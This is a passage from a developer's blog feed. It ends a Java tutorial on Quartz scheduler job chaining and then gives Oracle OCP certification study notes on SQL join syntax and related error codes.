<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">JobExecutionException</span><span class="op">;</span></span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> SimpleQuartzJob <span class="kw">implements</span> Job <span class="op">{</span></span>
<span id="cb1-9"><a aria-hidden="true" href="#cb1-9" tabindex="-1"></a></span>
<span id="cb1-10"><a aria-hidden="true" href="#cb1-10" tabindex="-1"></a> <span class="kw">public</span> <span class="fu">SimpleQuartzJob</span><span class="op">()</span> <span class="op">{</span></span>
<span id="cb1-11"><a aria-hidden="true" href="#cb1-11" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb1-12"><a aria-hidden="true" href="#cb1-12" tabindex="-1"></a></span>
<span id="cb1-13"><a aria-hidden="true" href="#cb1-13" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">void</span> <span class="fu">execute</span><span class="op">(</span>JobExecutionContext context<span class="op">)</span> <span class="kw">throws</span> JobExecutionException <span class="op">{</span></span>
<span id="cb1-14"><a aria-hidden="true" href="#cb1-14" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"In SimpleQuartzJob - executing its JOB at "</span></span>
<span id="cb1-15"><a aria-hidden="true" href="#cb1-15" tabindex="-1"></a> <span class="op">+</span> <span class="kw">new</span> <span class="bu">Date</span><span class="op">()</span> <span class="op">+</span> <span class="st">" by "</span> <span class="op">+</span> context<span class="op">.</span><span class="fu">getTrigger</span><span class="op">().</span><span class="fu">getName</span><span class="op">());</span></span>
<span id="cb1-16"><a aria-hidden="true" href="#cb1-16" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb1-17"><a aria-hidden="true" href="#cb1-17" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p><em>Notice that the execute method takes a JobExecutionContext object
as an argument. This object provides the runtime context around the job
instance. Specifically, it gives access to the scheduler and trigger,
which collaborated to initiate execution of the job as well as the job’s
JobDetail object. Quartz separates the execution and the surrounding
state of a job by placing the state in a JobDetail object and having the
JobDetail constructor initiate an instance of a job. The JobDetail
object stores the job’s listeners, group, data map, description, and
other properties of the job.</em></p>
<p>####Simple Trigger Example A trigger develops a schedule for job
execution. Quartz offers a few different trigger options of varying
complexity. The SimpleTrigger given below shows the fundamentals of
triggers.</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a>SimpleTriggerRunner<span class="op">.</span><span class="fu">java</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">JobDetail</span><span class="op">;</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">Scheduler</span><span class="op">;</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">SchedulerException</span><span class="op">;</span></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">Trigger</span><span class="op">;</span></span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">TriggerUtils</span><span class="op">;</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">impl</span><span class="op">.</span><span class="im">StdSchedulerFactory</span><span class="op">;</span></span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a></span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> Test<span class="op">{</span></span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">void</span> <span class="fu">scheduleTask</span><span class="op">()</span> <span class="kw">throws</span> SchedulerException <span class="op">{</span></span>
<span id="cb2-12"><a aria-hidden="true" href="#cb2-12" tabindex="-1"></a> <span class="cf">try</span><span class="op">{</span></span>
<span id="cb2-13"><a aria-hidden="true" href="#cb2-13" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Starting the scheduler in Quartz"</span><span class="op">);</span></span>
<span id="cb2-14"><a aria-hidden="true" href="#cb2-14" tabindex="-1"></a> StdSchedulerFactory schedFact <span class="op">=</span> <span class="kw">new</span> <span class="fu">StdSchedulerFactory</span><span class="op">();</span></span>
<span id="cb2-15"><a aria-hidden="true" href="#cb2-15" tabindex="-1"></a> Scheduler sched <span class="op">=</span> schedFact<span class="op">.</span><span class="fu">getScheduler</span><span class="op">();</span></span>
<span id="cb2-16"><a aria-hidden="true" href="#cb2-16" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Scheduling a Tickler job in Quartz"</span><span class="op">);</span></span>
<span id="cb2-17"><a aria-hidden="true" href="#cb2-17" tabindex="-1"></a></span>
<span id="cb2-18"><a aria-hidden="true" href="#cb2-18" tabindex="-1"></a> <span class="co">//Making a daily Trigger for the Job</span></span>
<span id="cb2-19"><a aria-hidden="true" href="#cb2-19" tabindex="-1"></a> Trigger simpleTrigger <span class="op">=</span> TriggerUtils<span class="op">.</span><span class="fu">makeDailyTrigger</span><span class="op">(</span><span class="dv">2</span><span class="op">,</span> <span class="bn">00</span><span class="op">);</span></span>
<span id="cb2-20"><a aria-hidden="true" href="#cb2-20" tabindex="-1"></a> simpleTrigger<span class="op">.</span><span class="fu">setName</span><span class="op">(</span><span class="st">"SimpleQuartzTrigger"</span><span class="op">);</span></span>
<span id="cb2-21"><a aria-hidden="true" href="#cb2-21" tabindex="-1"></a> simpleTrigger<span class="op">.</span><span class="fu">setGroup</span><span class="op">(</span>Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">);</span></span>
<span id="cb2-22"><a aria-hidden="true" href="#cb2-22" tabindex="-1"></a> JobDetail simpleJob <span class="op">=</span> <span class="kw">new</span> <span class="fu">JobDetail</span><span class="op">(</span><span class="st">"SimpleQuartzJob"</span><span class="op">,</span> Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">,</span> SimpleQuartzJob<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb2-23"><a aria-hidden="true" href="#cb2-23" tabindex="-1"></a> sched<span class="op">.</span><span class="fu">scheduleJob</span><span class="op">(</span>simpleJob<span class="op">,</span>simpleTrigger<span class="op">);</span></span>
<span id="cb2-24"><a aria-hidden="true" href="#cb2-24" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Tickler Mail Job Scheduled"</span><span class="op">);</span></span>
<span id="cb2-25"><a aria-hidden="true" href="#cb2-25" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-26"><a aria-hidden="true" href="#cb2-26" tabindex="-1"></a> <span class="cf">catch</span><span class="op">(</span><span class="bu">Exception</span> e<span class="op">){</span></span>
<span id="cb2-27"><a aria-hidden="true" href="#cb2-27" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Error while scheduling the jobs."</span><span class="op">);</span></span>
<span id="cb2-28"><a aria-hidden="true" href="#cb2-28" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">error</span><span class="op">(</span>e<span class="op">);</span></span>
<span id="cb2-29"><a aria-hidden="true" href="#cb2-29" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-30"><a aria-hidden="true" href="#cb2-30" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-31"><a aria-hidden="true" href="#cb2-31" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p>The scheduling method starts by instantiating a SchedulerFactory and
getting the scheduler. As discussed earlier, the JobDetail object is
created by taking the Job (SimpleQuartzJob) as an argument to its
constructor. The TriggerUtils.makeDailyTrigger creates a simple trigger
which executes the associated job(s) at 2:00 am everyday There are a
number of other ways to manipulate a SimpleTrigger. In addition to a
specified number of repeats and a specified repeat interval, jobs may be
schedules to execute at a specific calendar time, given a maximum time
of execution, or given a priority. Some of the advanced concepts include
CronTriggers, Job Stores, and JobMap etc.,</p>
<h3 id="need-for-job-chaining">Need for Job Chaining</h3>
<p>The job known as “MailProcessor” needs to be scheduled every 5
minutes i.e., this job has to execute every five minutes. The code which
was used for scheduling the job is given below:</p>
<pre><code>Trigger mailProcTrigger = TriggerUtils.makeMinutelyTrigger(5);
mailProcTrigger.setName(SchedulingConstants.MAILPROCESSOR_TRIGGER_NAME);
mailProcTrigger.setGroup(Scheduler.DEFAULT_GROUP);
JobDetail mailProc = new JobDetail(SchedulingConstants.MAILPROCESSOR_JOB_NAME, Scheduler.DEFAULT_GROUP, MailProcessor.class);
sched.scheduleJob(mailProc,mailProcTrigger);
logger.info("Mail Processor Scheduled");</code></pre>
<p>Following are the issues faced with this kind of scheduling</p>
<ol type="1">
<li>The SMTP Server needs to address online mailing at times.</li>
<li>The number of records in the table is high and hence the number of
mails to be sent are higher in number</li>
<li>Due to the above reasons, this job may have a completion of time of
more than five minutes, which means that the next schedule of the same
will get triggered even before the first one completes.</li>
</ol>
<p><strong>Solution</strong></p>
<p>Hence to resolve this, we need to chain the jobs such that the job
gets “re-scheduled” only after the first job is completed. This is known
as “Job-Chaining”</p>
<h3 id="job-chaining-how-it-was-implemented">Job Chaining – How it was
implemented</h3>
<ol type="1">
<li>A Utility Method for returning the time 5 minutes from now and
another Utility method for returning a SimpleTrigger using the
NextScheduledTime are created.</li>
<li>The first time scheduling of the Job is done with a SimpleTrigger
(Utility method) which starts the first job 5 minutes from the starting
instance</li>
</ol>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> <span class="co">//The Utility method to return the Next Scheduling time 5 minutes from now</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">static</span> <span class="bu">Date</span> <span class="fu">getNextMailScheduledTime</span><span class="op">()</span> <span class="op">{</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> <span class="bu">Calendar</span> cal <span class="op">=</span> <span class="bu">Calendar</span><span class="op">.</span><span class="fu">getInstance</span><span class="op">();</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Date Current: "</span><span class="op">+</span>cal<span class="op">.</span><span class="fu">getTimeInMillis</span><span class="op">());</span></span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a> cal<span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Calendar</span><span class="op">.</span><span class="fu">MINUTE</span><span class="op">,</span><span class="dv">1</span><span class="op">);</span></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Date after addition: "</span><span class="op">+</span>cal<span class="op">.</span><span class="fu">getTimeInMillis</span><span class="op">());</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> <span class="cf">return</span> cal<span class="op">.</span><span class="fu">getTime</span><span class="op">();</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> <span class="co">//The Utility Method to return a SimpleTrigger which used the NextScheduledTime Utility Method for the Triggering time</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">static</span> Trigger <span class="fu">getMailProcessorTrigger</span><span class="op">()</span> <span class="op">{</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a> <span class="bu">Date</span> newDate <span class="op">=</span> VsimsUtil<span class="op">.</span><span class="fu">getNextMailScheduledTime</span><span class="op">();</span></span>
<span id="cb4-13"><a aria-hidden="true" href="#cb4-13" tabindex="-1"></a> Trigger mailTrigger <span class="op">=</span> <span class="kw">new</span> <span class="fu">SimpleTrigger</span><span class="op">(</span>SchedulingConstants<span class="op">.</span><span class="fu">MAILPROCESSOR_TRIGGER_NAME</span><span class="op">,</span> Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">,</span>newDate<span class="op">);</span></span>
<span id="cb4-14"><a aria-hidden="true" href="#cb4-14" tabindex="-1"></a> mailTrigger<span class="op">.</span><span class="fu">setJobName</span><span class="op">(</span>SchedulingConstants<span class="op">.</span><span class="fu">MAILPROCESSOR_JOB_NAME</span><span class="op">);</span></span>
<span id="cb4-15"><a aria-hidden="true" href="#cb4-15" tabindex="-1"></a> mailTrigger<span class="op">.</span><span class="fu">setJobGroup</span><span class="op">(</span>Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">);</span></span>
<span id="cb4-16"><a aria-hidden="true" href="#cb4-16" tabindex="-1"></a> <span class="cf">return</span> mailTrigger<span class="op">;</span></span>
<span id="cb4-17"><a aria-hidden="true" href="#cb4-17" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<h3 id="scheduling-the-job-for-the-first-run">Scheduling the Job for the
First Run</h3>
<ol type="1">
<li><p>Using the Utility methods the “MailProcessor” Job is scheduled to
run after Five minutes from the current Instance</p></li>
<li><p>Since a specific time instance is given for the Trigger, this Job
will get Triggered only once</p>
<p>JobDetail mailJobDetail = new
JobDetail(“MailProcessorJob”,Scheduler.DEFAULT_GROUP,
MailProcessor.class); sched.scheduleJob(mailJobDetail,VsimsUtil
Util.getMailProcessorTrigger()); logger.info(“Mail Processor
Scheduled”);</p></li>
</ol>
<p>Note: <em>Since the Job is being scheduled for the first time we have
to use sched.scheduleJob() for scheduling the job</em></p>
<p>In the Execute method of the Job, once the Job gets fired for the
first time by the Trigger created, the Job Execution steps are completed
and then the job gets “re-scheduled’ after five minutes using the same
Utility method</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="kw">public</span> <span class="dt">void</span> <span class="fu">execute</span><span class="op">(</span>JobExecutionContext jobContext<span class="op">)</span> <span class="kw">throws</span> JobExecutionException <span class="op">{</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"MailProcessor execute - start"</span><span class="op">);</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a> <span class="co">//PERFORM THE JOB EXECUTION STEPS HERE</span></span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a> <span class="co">//Chaining of the Job by re-scheduling</span></span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a> <span class="cf">try</span> <span class="op">{</span></span>
<span id="cb5-7"><a aria-hidden="true" href="#cb5-7" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Scheduler Instance Id in Mail Processor: "</span><span class="op">+</span></span>
<span id="cb5-8"><a aria-hidden="true" href="#cb5-8" tabindex="-1"></a> <span class="op">+</span> jobContext<span class="op">.</span><span class="fu">getScheduler</span><span class="op">().</span><span class="fu">getSchedulerInstanceId</span><span class="op">());</span></span>
<span id="cb5-9"><a aria-hidden="true" href="#cb5-9" tabindex="-1"></a></span>
<span id="cb5-10"><a aria-hidden="true" href="#cb5-10" tabindex="-1"></a> <span class="co">//If Rescheduled Correctly, the Scheduler returns the next Scheduled Time of the JOB</span></span>
<span id="cb5-11"><a aria-hidden="true" href="#cb5-11" tabindex="-1"></a> <span class="bu">Date</span> nextScheduledTime <span class="op">=</span> jobContext<span class="op">.</span><span class="fu">getScheduler</span><span class="op">().</span><span class="fu">rescheduleJob</span></span>
<span id="cb5-12"><a aria-hidden="true" href="#cb5-12" tabindex="-1"></a> <span class="op">(</span><span class="st">"MailProcessorJob"</span><span class="op">,</span> Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">,</span> <span class="bu">Util</span><span class="op">.</span><span class="fu">getMailProcessorTrigger</span><span class="op">());</span></span>
<span id="cb5-13"><a aria-hidden="true" href="#cb5-13" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Rescheduled at : "</span><span class="op">+</span>nextScheduledTime<span class="op">);</span></span>
<span id="cb5-14"><a aria-hidden="true" href="#cb5-14" tabindex="-1"></a> <span class="op">}</span> <span class="cf">catch</span> <span class="op">(</span>SchedulerException e<span class="op">)</span> <span class="op">{</span></span>
<span id="cb5-15"><a aria-hidden="true" href="#cb5-15" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">error</span><span class="op">(</span><span class="st">"Error in Scheduling the Job for the Next Iteration"</span><span class="op">);</span></span>
<span id="cb5-16"><a aria-hidden="true" href="#cb5-16" tabindex="-1"></a> e<span class="op">.</span><span class="fu">printStackTrace</span><span class="op">();</span></span>
<span id="cb5-17"><a aria-hidden="true" href="#cb5-17" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb5-18"><a aria-hidden="true" href="#cb5-18" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>Note: <em>Since the same job is being chained, we have to use
rescheduleJob().</em></p>
<p>The re-scheduling also happens using the Trigger returned by the
Utility Method. Hence the job gets rescheduled only once. Hence the
subsequent run of the job will reschedule the job again for its next
run. Thus we achieve chaining of the job runs</p>
<h3 id="references">References</h3>
<ul>
<li><a href="http://quartz.sourceforge.net/firstTutorial.html">Quartz</a></li>
<li><a href="http://www-128.ibm.com/developerworks/java/library/j-quartz/">IBM
Quartz</a></li>
</ul>Studying for OCP - Oracle Certifed Professional - Part 22009-02-20T00:00:00-08:002009-02-20T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2009-02-20:/posts/studying-for-ocp-oracle-certifed-professional-part-2.htmlI am studying for the Oracle Certified Professional certification and following are notes which are specific to the certification, from the prep book. These notes are also helpful for a refresher on SQL syntax and usability.<p>I am studying for the Oracle Certified Professional certification and
following are notes which are specific to the certification, from the
prep book. These notes are also helpful for a refresher on SQL syntax
and usability.</p>
<p>Continued from <a href="studying-for-ocp-oracle-certifed-professional-part-1">Part
1</a></p>
<h3 id="chapter-7">Chapter 7</h3>
<ol type="1">
<li>equijoin - A row is associated with one or more rows in another
table based on the equality of column values or expressions.</li>
<li>nonequijoin - In this case, a row is associated with one or more
rows in another table if its column values fall into a range determined
by inequality operators.</li>
<li>associate rows with other rows in the same table -> hierarchical
-> self-join. .. Rows with null or differing entries in common join
columns are excluded when equijoins and nonequijoins are performed. ..
An outer join is available to fetch these one-legged or orphaned rows if
necessary. .. A cross join or Cartesian product is formed when every row
from one table is joined to all rows in another -> missing or
inadequate join conditions</li>
<li>When the source and target tables share identically named columns,
it is possible to perform a natural join between them without specifying
a join column. This is sometimes referred to as a pure natural join. ..
select region_name from regions natural join countries where
country_name=‘Canada’</li>
<li><strong>JOIN…USING</strong> .. select region_name from regions join
countries using (region_id) where country_name=‘Canada’ -> brackets
are a part of the syntax</li>
<li><strong>JOIN…ON</strong> -> most widely used natural join format.
.. select region_name from regions join countries on
(countries.region_id=regions.region_id) where country_name=‘Canada’
-> brackets are optional</li>
<li>cross join or cartesian product .. This join creates one row of
output for every combination of source and target table rows.</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="kw">select</span> <span class="fu">count</span>(<span class="op">*</span>) <span class="kw">from</span> regions <span class="kw">cross</span> <span class="kw">join</span> countries;</span></code></pre></div>
<ol start="8" type="1">
<li>[TRADITIONAL JOIN SYNTAX] A plus symbol enclosed in brackets (+) to
the left of the equal sign that indicates to Oracle that a right outer
join must be performed -> (+) =</li>
<li>The join returns additional values from the table WITHOUT the (+)
symbol</li>
<li>CARTESION JOIN: <code>select * from regions,countries;</code></li>
<li>SQL:1999 Syntax</li>
</ol>
<div class="sourceCode" id="cb2"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> [<span class="kw">NATURAL</span> <span class="kw">JOIN</span> table2] |</span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">USING</span> (column_name)] |</span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op">=</span> table2.column_name)] |</span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> [<span class="kw">LEFT</span> | <span class="kw">RIGHT</span> | <span class="kw">FULL</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="kw">ON</span> (table1.column_name <span class="op">=</span> table2.column_name)] |</span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> [<span class="kw">CROSS</span> <span class="kw">JOIN</span> table2];</span></code></pre></div>
<ol start="12" type="1">
<li>If no joins or fewer than N-1 joins are specified in the WHERE
clause conditions, where N refers to the number of tables in the query,
then a Cartesian or cross join is performed.</li>
<li>If ambiguous column is NOT aliased, ORA-00918:column ambiguously
defined</li>
<li>If Column used in JOIN…USING is aliased, ORA-25154:column part of
USING clause cannot have qualifier</li>
<li>Qualifying column references with dot notation to indicate a
column’s table of origin has a performance benefit. Time is saved
because Oracle is directed instantaneously to the appropriate table and
does not have to resolve the table name.</li>
<li>Natural JOIN</li>
</ol>
<div class="sourceCode" id="cb3"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a><span class="kw">FROM</span> table1</span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a><span class="kw">NATURAL</span> <span class="kw">JOIN</span> table2;</span></code></pre></div>
<pre><code>.. The pure natural join identifies the columns with common names in table1 and table2 and implicitly joins the tables using ALL THESE columns.
.. The columns in the SELECT clause may be qualified using dot notation unless they are one of the join columns</code></pre>
<ol start="17" type="1">
<li>If NATURAL JOIN Column Names are of incompatible data types :
ORA-01722: invalid number</li>
<li>If there are no common name columns, NATURAL JOIN Performs a
CARTESIAN PRODUCT</li>
<li>JOIN…USING .. select EMP.last_name, EMP.Department_id, JH.end_date,
job_id, employee_id from job_history JH join employees EMP using
(job_id,employee_id) .. Column used in the USING part should not be
qualified -> ORA-25154: column part of USING clause cannot have
qualifier .. Column not used in the USING part should be qualified if
ambigously defined -> ORA-00918: column ambiguously defined</li>
<li>The NATURAL keyword and USING (or) ON should not appear in the same
clause</li>
<li>When joining more than two tables NATURALLY, the intermin resultset
created will be joined to the Third table and if the resultset does not
have a common column with the Third table, then CARTESIAN PRODUCT
occurs</li>
<li>NON-EQUI JOINS</li>
</ol>
<div class="sourceCode" id="cb5"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op"><</span> table2.column_name)]|</span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op">></span> table2.column_name)]|</span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op"><=</span> table2.column_name)]|</span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.column_name <span class="op">>=</span> table2.column_name)]|</span>
<span id="cb5-7"><a aria-hidden="true" href="#cb5-7" tabindex="-1"></a> [<span class="kw">JOIN</span> table2 <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="kw">BETWEEN</span> table2.col1 <span class="kw">AND</span> table2.col2)]|</span></code></pre></div>
<ol start="23" type="1">
<li>JOIN Condition can have boolean variables of AND, OR and NOT ->
Need to evaluate to a BOOLEAN Expression</li>
</ol>
<div class="sourceCode" id="cb6"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a><span class="kw">select</span> E.JOB_ID <span class="kw">from</span> Employees e <span class="kw">join</span> jobs j <span class="kw">on</span> (e.salary<span class="op">></span><span class="dv">5000</span> <span class="kw">and</span> <span class="dv">2</span><span class="op">*</span>e.salary <span class="op"><</span> j.max_salary);</span></code></pre></div>
<ol start="24" type="1">
<li>LEFT Outer Join -> Rows from Source Table -> Rows from the
LEFT of the JOIN condition “X LEFT JOIN Y” -> Rows from X .. RIGHT
Outer Join -> Rows from Target Table -> Rows from the RIGHT of the
JOIN condition “X LEFT JOIN Y” -> Rows from Y .. FULL Outer Join
-> Both Source and Target tables</li>
</ol>
<div class="sourceCode" id="cb7"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a> <span class="kw">LEFT</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb7-4"><a aria-hidden="true" href="#cb7-4" tabindex="-1"></a> <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="op">=</span> table2.<span class="kw">column</span>);</span>
<span id="cb7-5"><a aria-hidden="true" href="#cb7-5" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-6"><a aria-hidden="true" href="#cb7-6" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-7"><a aria-hidden="true" href="#cb7-7" tabindex="-1"></a> <span class="kw">RIGHT</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb7-8"><a aria-hidden="true" href="#cb7-8" tabindex="-1"></a> <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="op">=</span> table2.<span class="kw">column</span>);</span>
<span id="cb7-9"><a aria-hidden="true" href="#cb7-9" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-10"><a aria-hidden="true" href="#cb7-10" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
<span id="cb7-11"><a aria-hidden="true" href="#cb7-11" tabindex="-1"></a> <span class="kw">FULL</span> <span class="kw">OUTER</span> <span class="kw">JOIN</span> table2</span>
<span id="cb7-12"><a aria-hidden="true" href="#cb7-12" tabindex="-1"></a> <span class="kw">ON</span> (table1.<span class="kw">column</span> <span class="op">=</span> table2.<span class="kw">column</span>);</span>
<span id="cb7-13"><a aria-hidden="true" href="#cb7-13" tabindex="-1"></a><span class="kw">SELECT</span> table1.<span class="kw">column</span>, table2.<span class="kw">column</span></span>
<span id="cb7-14"><a aria-hidden="true" href="#cb7-14" tabindex="-1"></a> <span class="kw">FROM</span> table1</span>
